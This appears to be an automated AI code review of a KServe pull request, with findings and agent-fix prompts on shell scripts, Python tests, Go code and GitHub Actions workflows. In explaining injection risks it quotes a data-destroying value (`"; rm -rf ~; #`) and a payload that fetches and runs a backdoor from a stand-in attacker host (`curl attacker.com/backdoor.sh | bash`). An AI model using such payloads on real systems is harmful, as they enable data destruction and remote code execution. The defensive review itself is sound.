Verify each finding against the current code and only fix it if needed.

In `@hack/setup/infra/manage.prometheus-adapter-helm.sh` around lines 60 - 68, The
existence check for the release currently uses `helm list ... | grep -q
"prometheus-adapter"` which matches substrings and can detect the wrong release;
replace that logic with an exact release check (for example call `helm list -n
"${PROMETHEUS_ADAPTER_NAMESPACE}" -q` and test for an anchored match like
`^prometheus-adapter$`, or use `helm status prometheus-adapter -n
"${PROMETHEUS_ADAPTER_NAMESPACE}" >/dev/null 2>&1`), and ensure the subsequent
`uninstall` call operates on the same literal release name
(`prometheus-adapter`) so the detected release is actually removed before
installing.
hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh-279-287 (1)

279-287: ⚠️ Potential issue | 🟡 Minor

Dead error branch — kubectl wait already aborts under set -e.

With set -o errexit (line 27), a non-zero exit from kubectl wait terminates the script before line 281 runs, so the if [ $? -eq 0 ] branch is unreachable on failure. Either drop set -e coverage for this one call (kubectl wait ... || rc=$?) or remove the conditional.

🛠️ Proposed fix
-    kubectl wait --timeout="$timeout" -n "$namespace" deployment/"$deployment_name" --for=condition=Available
-
-    if [ $? -eq 0 ]; then
-        log_success "Deployment '$deployment_name' in namespace '$namespace' is available!"
-    else
+    if kubectl wait --timeout="$timeout" -n "$namespace" deployment/"$deployment_name" --for=condition=Available; then
+        log_success "Deployment '$deployment_name' in namespace '$namespace' is available!"
+    else
         log_error "Deployment '$deployment_name' in namespace '$namespace' failed to become available within $timeout"
         return 1
     fi
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh`
around lines 279 - 287, The current block uses "kubectl wait" under global "set
-o errexit", so failures will abort the script before the subsequent "if [ $?
-eq 0 ]" conditional runs; update the logic around the kubectl wait call
(referencing kubectl wait and variables deployment_name, namespace, timeout) to
capture its exit status explicitly (for example run kubectl wait ... || rc=$? or
use an if kubectl wait ...; then ...; else ...; fi style) and then use that
captured exit code to decide whether to call log_success or log_error and return
1.
test/e2e/llmisvc/test_llm_autoscaling.py-208-214 (1)

208-214: ⚠️ Potential issue | 🟡 Minor

Silent except Exception: pass hides connection failures in the load generator.

If the endpoint is wrong (DNS, port, wrong proxy), every request fails and the test still "succeeds" the load phase before asserting wait_for_pod_count(..., min_count=2), which then times out — you'll debug the autoscaler when in fact zero load reached it. At minimum, count failures and log a summary so the scale-up failure mode is distinguishable from a load-delivery failure mode.

🛠️ Proposed fix
-    def _worker():
+    def _worker():
+        errors = 0
         while time.time() < deadline:
             try:
                 requests.post(endpoint, json=payload, headers=headers, timeout=30)
-            except Exception:
-                pass
+            except requests.RequestException as e:
+                errors += 1
+                if errors == 1 or errors % 50 == 0:
+                    logger.warning("load worker request failed (%d so far): %s", errors, e)
             time.sleep(0.1)
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@test/e2e/llmisvc/test_llm_autoscaling.py` around lines 208 - 214, The load
generator's _worker currently swallows all exceptions from requests.post which
hides connection failures; update _worker to track request outcomes by
introducing counters (e.g., total_requests and failed_requests) in the enclosing
scope, increment total_requests on each attempt and increment failed_requests
inside the except Exception block, and periodically or at the end log a concise
summary including endpoint, total_requests, failed_requests and an error rate so
scale-up failures can be distinguished from load-delivery failures; reference
the _worker function and the requests.post call (using endpoint, payload,
headers, timeout) when making these additions and ensure the summary is asserted
or surfaced after the load phase before calling wait_for_pod_count.
hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh-562-585 (1)

562-585: ⚠️ Potential issue | 🟡 Minor

eval on an externally-derived identifier is a CWE-94 liability.

eval "current_value=\${${var_name}}" / eval "export $var_name=\"$component_value\"" executes arbitrary shell if var_name or component_value ever originates from user input. Today all callers are in-repo, but the function has no validation, no [[ "$var_name" =~ ^[A-Z_][A-Z0-9_]*$ ]] guard, and component_value is interpolated unquoted into the eval string — a value containing "; rm -rf ~; # would execute. Prefer declare -n (bash 4.3+) or printf -v.

🛠️ Proposed fix
-    local current_value
-    eval "current_value=\${${var_name}}"
+    local current_value="${!var_name:-}"
@@
-    if [ -n "$component_value" ]; then
-        eval "export $var_name=\"$component_value\""
-    elif [ -n "$global_value" ]; then
-        eval "export $var_name=\"$global_value\""
-    fi
+    if [ -n "$component_value" ]; then
+        printf -v "$var_name" '%s' "$component_value"
+        export "$var_name"
+    elif [ -n "$global_value" ]; then
+        printf -v "$var_name" '%s' "$global_value"
+        export "$var_name"
+    fi

As per coding guidelines: "Avoid eval and dynamic command execution".

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh`
around lines 562 - 585, The function set_env_with_priority uses eval with
external identifiers (eval "current_value=\${${var_name}}" and eval "export
$var_name=\"$component_value\""), which is unsafe; validate var_name against a
safe identifier regex (e.g. [[ "$var_name" =~ ^[A-Z_][A-Z0-9_]*$ ]]) and
reject/exit if it fails, then replace eval usage with safe indirection and
assignment: read current value via indirect expansion
(current_value="${!var_name}") and set the value using printf -v "$var_name"
'%s' "$component_value" (or declare -n ref="$var_name" on bash ≥4.3) and export
with export "$var_name" (after setting) — also ensure component_value and
global_value are used only as data (quoted) when assigning to avoid command
injection.
test/e2e/llmisvc/test_llm_autoscaling.py-140-145 (1)

140-145: ⚠️ Potential issue | 🟡 Minor

_child_name uses naive truncation instead of hashing like kmeta.ChildName.

Knative's kmeta.ChildName appends a hash suffix when the concatenated name exceeds the DNS label limit and uses a hash-based format when the suffix alone exceeds 31 characters. The Python helper instead naively concatenates and slices to 63 chars. When a service_name is long enough (≥ ~45 chars + suffix like -kserve-prefill-hpa), this generates a different string than the actual controller produces, causing assert_scaling_resources_exist and assert_scaling_resources_deleted assertions to fail for the wrong reason.

Current test names are short enough to avoid this, but this is a latent defect for any future test with a longer service name.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@test/e2e/llmisvc/test_llm_autoscaling.py` around lines 140 - 145, The
_child_name helper currently truncates parent+suffix naively which diverges from
knative.dev/pkg/kmeta.ChildName; replace its logic so it mirrors
kmeta.ChildName: when parent+suffix exceeds 63 chars compute a deterministic
hash (e.g., SHA-1/sha256) of the parent and embed a short hex hash segment
instead of simple truncation; also handle the case where the suffix alone is
long (suffix > 31) by using the hash-based format used by kmeta (produce a
stable name comprised of a truncated parent, a separator, hex hash, and the
suffix) so names produced by _child_name match the controller and fix failing
assertions like assert_scaling_resources_exist/assert_scaling_resources_deleted
that rely on identical naming.
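For reference, a Python sketch of the hash-based naming the finding describes. The constants mirror the behavior documented for kmeta.ChildName (63-char DNS label, 32-char md5 hex digest); exact truncation offsets should be verified against knative.dev/pkg's kmeta/names.go before relying on byte-for-byte parity:

```python
import hashlib

LONGEST = 63               # max DNS-1123 label length
MD5_LEN = 32               # hex md5 digest length
HEAD = LONGEST - MD5_LEN   # 31: room left for the parent before the hash


def child_name(parent: str, suffix: str) -> str:
    """Sketch of kmeta.ChildName-style naming: short names pass
    through; long names embed a deterministic md5 segment instead of
    being naively truncated."""
    if len(parent) <= LONGEST - len(suffix):
        return parent + suffix
    if HEAD - len(suffix) <= 0:
        # Suffix alone (nearly) fills the label: hash parent+suffix.
        digest = hashlib.md5((parent + suffix).encode()).hexdigest()
        return (parent + digest)[:LONGEST]
    digest = hashlib.md5(parent.encode()).hexdigest()
    return parent[: HEAD - len(suffix)] + digest + suffix
```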
pkg/controller/v1alpha2/llmisvc/scheduler.go-1041-1047 (1)

1041-1047: ⚠️ Potential issue | 🟡 Minor

Threshold comparison via fmt.Sprintf("%v", …) != "0" is fragile.

YAML decoders yield dynamically typed scalars (int, float64, or even a string, depending on the decoder path), so comparing the %v-formatted value against the literal "0" ties correctness to per-type formatting; a string "0.0", for instance, never equals "0". Compare by actual numeric value instead: type-switch on thresholdVal, handling int and float64 (with string parsing as a fallback), and test against zero.

Occurs at lines 1045 and 1195.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha2/llmisvc/scheduler.go` around lines 1041 - 1047, The
current check using fmt.Sprintf("%v", thresholdVal) != "0" is fragile; update
the logic around thresholdVal/thresholdFound (the unstructured.NestedFieldNoCopy
call in scheduler.go) to perform a numeric zero check instead: do a type switch
on thresholdVal handling float64, int (and string as fallback by parsing) and
compare numeric value to 0 (e.g., float64 == 0.0 or int == 0); ensure you treat
missing/unsupported types as non-zero or continue. Replace the string-format
comparison with this type-aware numeric comparison wherever thresholdVal is used
(locations referenced by thresholdVal, thresholdFound, pluginMap).
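For reference, a Python analogue of the suggested type-aware check (the function name is hypothetical; the Go fix would type-switch on int/float64 the same way). Unsupported types are conservatively treated as non-zero, as the prompt suggests:

```python
def is_nonzero_threshold(value) -> bool:
    """Type-aware zero check: handle ints/floats by value, parse
    strings as a fallback, treat anything unparseable as non-zero."""
    if isinstance(value, bool):        # bool is an int subclass; exclude it
        return value
    if isinstance(value, (int, float)):
        return value != 0
    if isinstance(value, str):
        try:
            return float(value) != 0
        except ValueError:
            return True                # unparseable string: assume non-zero
    return True                        # unsupported type: assume non-zero
```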
🧹 Nitpick comments (9)
python/kserve/kserve/model_server.py (1)

131-141: Flag name uses hyphens while most KServe flags use underscores. --timeout-keep-alive follows the newer --event-loop style, but the majority of flags in this parser are underscore-delimited (--http_port, --max_threads, --log_config_file, etc.). argparse won't accept --timeout_keep_alive as an alias unless added explicitly, so any user/script copying the existing underscore convention will get a parse error. Consider either registering an underscore alias for backward/ergonomic consistency, or documenting the intentional shift.

♻️ Optional alias
 parser.add_argument(
-    "--timeout-keep-alive",
+    "--timeout-keep-alive", "--timeout_keep_alive",
     dest="timeout_keep_alive",
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@python/kserve/kserve/model_server.py` around lines 131 - 141, The flag name
uses hyphens while most KServe flags use underscores; update the
parser.add_argument call that defines "--timeout-keep-alive"
(dest="timeout_keep_alive") to also accept an underscore alias so scripts using
the underscore style won't break: add the second option string
"--timeout_keep_alive" (keeping dest="timeout_keep_alive", default=65, type=int,
help unchanged) in the same parser.add_argument call that currently registers
"--timeout-keep-alive" so both forms parse identically.
python/kserve/kserve/protocol/rest/server.py (1)

80-101: No bounds check on timeout_keep_alive. Negative or zero values are accepted here and handed straight to uvicorn.Config, where behavior is undefined/loosely defined. Low risk since this is CLI-sourced, but an `if timeout_keep_alive <= 0: raise ValueError(...)` guard (or a clamp) would make misconfiguration fail loudly instead of producing connections that drop unexpectedly.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@python/kserve/kserve/protocol/rest/server.py` around lines 80 - 101, The
constructor accepts timeout_keep_alive and passes it to uvicorn.Config without
validation; add a bounds check in the initializer (before creating self.config)
to reject non-positive values (e.g., if timeout_keep_alive <= 0: raise
ValueError("timeout_keep_alive must be > 0")) or clamp it to a sensible minimum,
so the parameter used in uvicorn.Config is always valid; update the code around
the timeout_keep_alive parameter handling where self.config is created to
perform this check and raise a clear error referencing timeout_keep_alive and
uvicorn.Config.
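For reference, the guard could be as small as a standalone helper called before self.config is built; a sketch under the assumption that the value arrives as an int from argparse (the helper name is hypothetical):

```python
def validate_timeout_keep_alive(timeout_keep_alive: int) -> int:
    """Reject non-positive keep-alive timeouts before they reach
    uvicorn.Config, so misconfiguration fails loudly at startup."""
    if not isinstance(timeout_keep_alive, int) or timeout_keep_alive <= 0:
        raise ValueError(
            f"timeout_keep_alive must be a positive integer, "
            f"got {timeout_keep_alive!r}"
        )
    return timeout_keep_alive
```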
python/kserve/kserve/protocol/rest/multiprocess/server.py (1)

139-149: Positional forwarding into RESTServer is brittle. Every one of these nine arguments is passed positionally, so any future reorder or insertion in RESTServer.__init__ (e.g., adding a parameter between grace_period and event_loop) will silently shift event_loop into timeout_keep_alive and produce a nonsense uvicorn config with no type error. Switching to keyword arguments removes this foot-gun at zero cost.

♻️ Proposed refactor
         self._rest_server = RESTServer(
-            app,
-            data_plane,
-            model_repository_extension,
-            http_port,
-            access_log_format,
-            workers,
-            grace_period,
-            event_loop,
-            timeout_keep_alive,
+            app=app,
+            data_plane=data_plane,
+            model_repository_extension=model_repository_extension,
+            http_port=http_port,
+            access_log_format=access_log_format,
+            workers=workers,
+            grace_period=grace_period,
+            event_loop=event_loop,
+            timeout_keep_alive=timeout_keep_alive,
         )
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@python/kserve/kserve/protocol/rest/multiprocess/server.py` around lines 139 -
149, The call to RESTServer in server.py passes nine arguments positionally
which is brittle; change the instantiation to use explicit keyword arguments
matching RESTServer.__init__ (e.g., app=app, data_plane=data_plane,
model_repository_extension=model_repository_extension, http_port=http_port,
access_log_format=access_log_format, workers=workers, grace_period=grace_period,
event_loop=event_loop, timeout_keep_alive=timeout_keep_alive) so parameters
cannot be misaligned if the constructor signature changes.
python/kserve/test/test_rest_server.py (1)

50-52: Misleading inline comments in parametrize cases. (65, 65) is passed explicitly, so it isn't exercising the "default value" code path (that's what test_config_timeout_keep_alive_default covers). Similarly (5, 5) # uvicorn default passes 5 explicitly — this test only verifies propagation into uvicorn.Config, not that uvicorn's own default is 5. Consider rewording or removing the comments to avoid confusing future readers about what's actually under test.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@python/kserve/test/test_rest_server.py` around lines 50 - 52, The inline
comments next to the parametrized tuples (65, 65), (120, 120), and (5, 5) are
misleading because those tuples are explicit values (not exercising
uvicorn/default code paths); update the comments in
python/kserve/test/test_rest_server.py for the parametrized test that covers
timeout_keep_alive (and related test_config_timeout_keep_alive_default) to
either remove the incorrect notes or replace them with accurate notes such as
"explicit value" for (65,65) and (120,120) and "explicit propagation check into
uvicorn.Config" for (5,5), so readers understand these cases validate value
propagation rather than uvicorn defaults.
python/custom_transformer/pyproject.toml (1)

26-33: Consolidate duplicated [tool.uv.sources] and [[tool.uv.index]] blocks into a uv workspace.

The pytorch-cpu index definition is copy-pasted identically between python/custom_model/pyproject.toml (lines 22–29) and python/custom_transformer/pyproject.toml (lines 26–33). Future updates to the URL, name, or explicit flag must be mirrored in both locations, creating drift risk. Since no uv workspace root exists in python/pyproject.toml, promote this shared configuration to a workspace-level declaration to maintain a single source of truth.

Non-blocking for this PR.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@python/custom_transformer/pyproject.toml` around lines 26 - 33, Duplicate
[tool.uv.sources] and [[tool.uv.index]] blocks for the pytorch-cpu index
(entries for torch and torchvision, and the index with name = "pytorch-cpu", url
= "https://download.pytorch.org/whl/cpu", explicit = true) should be moved to
the workspace-level pyproject.toml under a single [tool.uv.sources] and
[[tool.uv.index]] declaration; remove the duplicate blocks from the module
pyproject.toml files so they inherit from the workspace root, ensuring the
single source of truth for the index configuration.
test/e2e/pytest.ini (1)

24-25: Marker registration duplicated in test/e2e/llmisvc/conftest.py.

autoscaling_hpa and autoscaling_keda are now declared in both pytest.ini and via config.addinivalue_line(...) in test/e2e/llmisvc/conftest.py. Not harmful, but it's two places to keep in sync on rename. Consider consolidating to pytest.ini only (it already applies repo-wide for the e2e suite) and dropping the addinivalue_line calls for these two from conftest.py.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@test/e2e/pytest.ini` around lines 24 - 25, Remove the duplicate marker
registration by deleting the two config.addinivalue_line(...) calls for
"autoscaling_hpa" and "autoscaling_keda" from test/e2e/llmisvc/conftest.py and
rely on the declarations already present in pytest.ini; specifically locate the
addinivalue_line usages in conftest.py that reference the autoscaling_hpa and
autoscaling_keda markers and remove those lines so the markers are declared only
in pytest.ini.
test/scripts/gh-actions/setup-deps.sh (1)

110-121: Unknown LLMISVC_AUTOSCALER values silently do nothing.

A typo like hap or kda passed from the workflow input produces no error and no autoscaler install, which will surface later as a confusing e2e failure. Consider validating the value and failing fast (only none|hpa|keda allowed).

🔧 Proposed fix
   if [[ $LLMISVC_AUTOSCALER == "hpa" ]]; then
     ...
   elif [[ $LLMISVC_AUTOSCALER == "keda" ]]; then
     ...
+  elif [[ $LLMISVC_AUTOSCALER != "none" ]]; then
+    echo "ERROR: Unknown LLMISVC_AUTOSCALER='${LLMISVC_AUTOSCALER}' (expected one of: none, hpa, keda)" >&2
+    exit 1
   fi
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@test/scripts/gh-actions/setup-deps.sh` around lines 110 - 121, Validate the
LLMISVC_AUTOSCALER value before branching: check that the environment variable
LLMISVC_AUTOSCALER is one of the allowed values ("none", "hpa", "keda") and if
not, print a clear error including the invalid value and exit with non-zero
status; update the existing conditional block that currently handles "hpa" and
"keda" to include an explicit "none" case (no-op) and add an else branch that
fails fast, so typos like "hap" or "kda" will cause the script to abort
immediately.
hack/setup/infra/manage.wva-helm.sh (1)

96-96: ${WVA_EXTRA_ARGS:-} is intentionally unquoted — document the contract.

The unquoted expansion is needed so callers can pass multiple flags via one env var, but that means values containing spaces (e.g., --set foo="a b") will be mis-split. Either document that WVA_EXTRA_ARGS must be shell-safe, or switch to an array (WVA_EXTRA_ARGS=(--set k=v ...) expanded as "${WVA_EXTRA_ARGS[@]}") for robustness. Shellcheck SC2086 is a true positive on the quoting rule but the split is intentional here.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/infra/manage.wva-helm.sh` at line 96, The unquoted expansion of
WVA_EXTRA_ARGS is intentional to allow multiple flags but risks word-splitting
for values with spaces; either document the contract that WVA_EXTRA_ARGS must be
shell-safe (no unescaped spaces, e.g., callers must quote or escape inner
spaces) or change the variable into a bash array and expand it safely;
specifically update the script references to use the WVA_EXTRA_ARGS array (and
all callers) and expand as the array form to preserve tokens, and add a short
comment above the variable expansion explaining the chosen contract so
ShellCheck/maintainers understand the intent.
hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh (1)

666-691: Duplicate variable definitions silently override earlier values.

PROMETHEUS_NAMESPACE (lines 666, 687) and WVA_NAMESPACE (lines 668, 689) are defined twice with identical defaults. Not a bug today, but if the "Global" block is ever retuned (e.g. a different default namespace or an override chain via set_env_with_priority), the second assignment clobbers the first and the divergence will be invisible. Drop the duplicates in the "Component-Specific" section.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh`
around lines 666 - 691, Remove the duplicate environment variable assignments in
the "Component-Specific" section: delete the redundant PROMETHEUS_NAMESPACE and
WVA_NAMESPACE lines so the global defaults (PROMETHEUS_NAMESPACE and
WVA_NAMESPACE set earlier) are the authoritative definitions; keep the other
component-specific variables (PROMETHEUS_RELEASE_NAME, WVA_RELEASE_NAME,
WVA_PROMETHEUS_URL) intact and verify there are no other duplicated vars in that
block.

ℹ️ Review info
⚙️ Run configuration

Configuration used: Central YAML (base), Organization UI (inherited)

Review profile: CHILL

Plan: Enterprise

Run ID: 7dc152a9-162e-4bd4-adb9-abb07b3bf516

📥 Commits

Reviewing files that changed from the base of the PR and between 56fa4f8 and e094d85.

⛔ Files ignored due to path filters (3)
  • go.sum is excluded by !**/*.sum, !**/*.sum
  • python/custom_model/uv.lock is excluded by !**/*.lock
  • python/custom_transformer/uv.lock is excluded by !**/*.lock
📒 Files selected for processing (50)
  • .github/actions/kserve-dep-setup/action.yml
  • .github/workflows/comment-cherry-pick.yml
  • .github/workflows/e2e-test-llmisvc.yaml
  • .github/workflows/e2e-test-quick-install.yaml
  • .github/workflows/e2e-test.yml
  • charts/kserve-runtime-configs/files/llmisvcconfigs/resources.yaml
  • config/llmisvcconfig/config-llm-decode-template.yaml
  • config/llmisvcconfig/config-llm-decode-worker-data-parallel.yaml
  • config/llmisvcconfig/config-llm-scheduler.yaml
  • config/overlays/test/s3-local-backend/seaweedfs-deployment.yaml
  • docs/samples/llmisvc/multi-gpu-vendor/README.md
  • docs/samples/llmisvc/multi-gpu-vendor/llm-inference-service-qwen2-7b-amd-no-scheduler.yaml
  • docs/samples/llmisvc/multi-gpu-vendor/llm-inference-service-qwen2-7b-nvidia-with-scheduler.yaml
  • go.mod
  • hack/setup/global-vars.env
  • hack/setup/infra/manage.prometheus-adapter-helm.sh
  • hack/setup/infra/manage.prometheus-helm.sh
  • hack/setup/infra/manage.wva-helm.sh
  • hack/setup/quick-install/definitions/llmisvc/llmisvc-autoscaling-hpa-dependency-install.definition
  • hack/setup/quick-install/definitions/llmisvc/llmisvc-autoscaling-keda-dependency-install.definition
  • hack/setup/quick-install/keda-dependency-install.sh
  • hack/setup/quick-install/kserve-knative-mode-dependency-install.sh
  • hack/setup/quick-install/kserve-knative-mode-full-install-helm.sh
  • hack/setup/quick-install/kserve-knative-mode-full-install-with-manifests.sh
  • hack/setup/quick-install/kserve-standard-mode-dependency-install.sh
  • hack/setup/quick-install/kserve-standard-mode-full-install-helm.sh
  • hack/setup/quick-install/kserve-standard-mode-full-install-with-manifests.sh
  • hack/setup/quick-install/llmisvc-autoscaling-hpa-dependency-install.sh
  • hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh
  • hack/setup/quick-install/llmisvc-dependency-install.sh
  • hack/setup/quick-install/llmisvc-full-install-helm.sh
  • hack/setup/quick-install/llmisvc-full-install-with-manifests.sh
  • kserve-deps.env
  • pkg/controller/v1alpha2/llmisvc/config_merge_test.go
  • pkg/controller/v1alpha2/llmisvc/config_presets_test.go
  • pkg/controller/v1alpha2/llmisvc/controller_int_scheduler_config_test.go
  • pkg/controller/v1alpha2/llmisvc/scheduler.go
  • pkg/controller/v1alpha2/llmisvc/scheduler_test.go
  • python/custom_model/pyproject.toml
  • python/custom_transformer/pyproject.toml
  • python/kserve/kserve/model_server.py
  • python/kserve/kserve/protocol/rest/multiprocess/server.py
  • python/kserve/kserve/protocol/rest/server.py
  • python/kserve/test/test_rest_server.py
  • test/e2e/llmisvc/conftest.py
  • test/e2e/llmisvc/fixtures.py
  • test/e2e/llmisvc/test_llm_autoscaling.py
  • test/e2e/pytest.ini
  • test/scripts/gh-actions/setup-deps.sh
  • test/scripts/gh-actions/setup-kserve.sh

Comment on lines 29 to +32
run: |
shopt -s nocasematch
echo "Selected network layer ${{ inputs.network-layer }}"
./test/scripts/gh-actions/setup-deps.sh ${{ inputs.deployment-mode }} "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}"
./test/scripts/gh-actions/setup-deps.sh ${{ inputs.deployment-mode }} "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}" "${{ inputs.autoscaler }}"

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

cat -n .github/actions/kserve-dep-setup/action.yml | head -40

Repository: opendatahub-io/kserve

Length of output: 1709


🌐 Web query:

GitHub Actions inputs shell command injection escaping behavior

💡 Result:

GitHub Actions does not automatically escape inputs (from workflow_dispatch, workflow_call, or an action's with:) for safe use in shell commands. When ${{ inputs.name }} or ${{ github.event.inputs.name }} is used directly in a run: block, GitHub evaluates the expression and substitutes the raw string value into the shell script before the shell executes it. This raw substitution allows shell command injection if the input contains shell metacharacters such as `"`, `;`, `$`, or backticks. Vulnerable example: `- run: echo "version=${{ inputs.version }}"`; a malicious input like `1.0; curl attacker.com/backdoor.sh | bash` breaks out and executes arbitrary code. Safe usage: assign the input to an env var at the step level (`env: VERSION: ${{ inputs.version }}`), then reference it as a properly quoted shell variable (`"$VERSION"`); the shell then treats the value as literal data even if it contains metacharacters. Additional mitigations: validate inputs with a regex, use if: conditions or script files instead of inline run:, and minimize permissions. This behavior is consistent across shells (bash, pwsh, etc.) and applies to all untrusted inputs such as github.event.*.


Quote inputs.deployment-mode before passing to shell.

${{ inputs.deployment-mode }} is unquoted at line 32 while adjacent inputs are properly quoted. GitHub Actions does not auto-escape inputs in run: blocks—raw substitution allows shell metacharacters to break argument boundaries and inject arbitrary commands (CWE-78). The input defaults to serverless or raw per the action definition, but remains user-controlled and must be quoted.

🛠️ Proposed fix
-        ./test/scripts/gh-actions/setup-deps.sh ${{ inputs.deployment-mode }} "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}" "${{ inputs.autoscaler }}"
+        ./test/scripts/gh-actions/setup-deps.sh "${{ inputs.deployment-mode }}" "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}" "${{ inputs.autoscaler }}"
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
run: |
shopt -s nocasematch
echo "Selected network layer ${{ inputs.network-layer }}"
./test/scripts/gh-actions/setup-deps.sh ${{ inputs.deployment-mode }} "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}"
./test/scripts/gh-actions/setup-deps.sh ${{ inputs.deployment-mode }} "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}" "${{ inputs.autoscaler }}"
run: |
shopt -s nocasematch
echo "Selected network layer ${{ inputs.network-layer }}"
./test/scripts/gh-actions/setup-deps.sh "${{ inputs.deployment-mode }}" "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}" "${{ inputs.autoscaler }}"
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In @.github/actions/kserve-dep-setup/action.yml around lines 29 - 32, The run
block in action.yml passes the unquoted GitHub Actions input ${{
inputs.deployment-mode }} to the setup script, which can allow shell
metacharacter injection; update the command that invokes
./test/scripts/gh-actions/setup-deps.sh so that the deployment-mode argument is
wrapped in quotes just like the adjacent inputs (i.e., pass "${{
inputs.deployment-mode }}" alongside "${{ inputs.network-layer }}" etc.),
ensuring all inputs are consistently quoted before being forwarded to the shell.

Comment on lines +244 to +353
test-llmisvc-wva-autoscaling-hpa:
runs-on: ubuntu-latest
needs: [detect-changes, llmisvc-image-build]
strategy:
fail-fast: false
matrix:
install-method: ${{ fromJSON(needs.detect-changes.outputs.install_methods) }}
steps:
- name: Checkout source
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1

- name: Merge target branch
if: github.event_name == 'pull_request'
run: |
git fetch --unshallow origin
git fetch origin ${{ github.event.pull_request.base.ref }}
git config user.email "ci@kserve.io"
git config user.name "CI Bot"
git merge --no-edit origin/${{ github.event.pull_request.base.ref }}

- name: Load KServe environment variables
run: ./kserve-images.sh --ci

- name: Free-up disk space
uses: ./.github/actions/free-up-disk-space

- name: Setup Go
uses: actions/setup-go@40f1582b2485089dde7abd97c1529aa768e1baff # v5.6.0
with:
go-version-file: go.mod

- name: Setup Python
uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5.6.0
with:
python-version: "3.9"

- name: Setup Minikube
uses: ./.github/actions/minikube-setup

- name: Download LLMISvc controller image
uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4.3.0
with:
name: ${{ env.LLMISVC_CONTROLLER_IMG }}-${{ env.TAG }}
path: ./tmp

- name: Download storage-initializer image
uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4.3.0
with:
name: ${{ env.STORAGE_INIT_IMG }}-${{ env.TAG }}
path: ./tmp

- name: Load LLMISvc controller image into minikube
run: |
minikube image load ./tmp/${{ env.LLMISVC_CONTROLLER_IMG }}-${{ env.TAG }}
echo "Images in minikube:"
minikube image ls | grep ${{ env.LLMISVC_CONTROLLER_IMG }} || echo "No llmisvc-controller images found"

- name: Load storage-initializer image into minikube
run: |
minikube image load ./tmp/${{ env.STORAGE_INIT_IMG }}-${{ env.TAG }}
echo "Images in minikube:"
minikube image ls | grep ${{ env.STORAGE_INIT_IMG }} || echo "No storage-initializer images found"

- name: KServe dependency setup (HPA autoscaling)
uses: ./.github/actions/kserve-dep-setup
with:
deploy-llmisvc: "true"
autoscaler: "hpa"

- name: Install UV
run: ./test/scripts/gh-actions/setup-uv.sh

- name: Install KServe
run: |
${{ matrix.install-method == 'helm' && 'export INSTALL_METHOD="helm"' || '' }}
./test/scripts/gh-actions/setup-kserve.sh

- name: Verify HPA autoscaling setup
run: |
echo "Verifying HPA autoscaling infrastructure..."

echo "Prometheus:"
kubectl get pods -n monitoring -l app.kubernetes.io/name=prometheus || true

echo "Prometheus Adapter:"
kubectl get pods -n monitoring -l app.kubernetes.io/name=prometheus-adapter || true

echo "WVA:"
kubectl get pods -n wva-system || true

echo "CRDs:"
kubectl get crd variantautoscalings.llmd.ai || true

echo "External Metrics API:"
kubectl get apiservice v1beta1.external.metrics.k8s.io || true

echo ""
echo "HPA autoscaling setup verification complete!"

- name: Run HPA autoscaling E2E tests
id: autoscaling-hpa-tests
timeout-minutes: 40
run: |
./test/scripts/gh-actions/run-e2e-tests.sh "llminferenceservice and autoscaling_hpa and cluster_cpu" 0 "envoy-gateway"

- name: Check system status
if: always()
run: |
./test/scripts/gh-actions/status-check.sh "llmisvc"



⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

cat .github/workflows/e2e-test-llmisvc.yaml

Repository: opendatahub-io/kserve

Length of output: 16862


Declare explicit permissions: blocks on all jobs to enforce least-privilege token scope (CWE-732).

The workflow lacks job-level permissions: declarations. Every job (detect-changes, llmisvc-image-build, test-llmisvc, and both autoscaling jobs) inherits the repository default token scope, allowing full GITHUB_TOKEN access if any step is compromised. Additionally, the "Merge target branch" steps across multiple jobs directly interpolate ${{ github.event.pull_request.base.ref }} in shell commands, violating the requirement to avoid event data interpolation in run: blocks (CWE-94). Use github.base_ref or intermediate environment variables instead.

🤖 Prompt for AI Agents
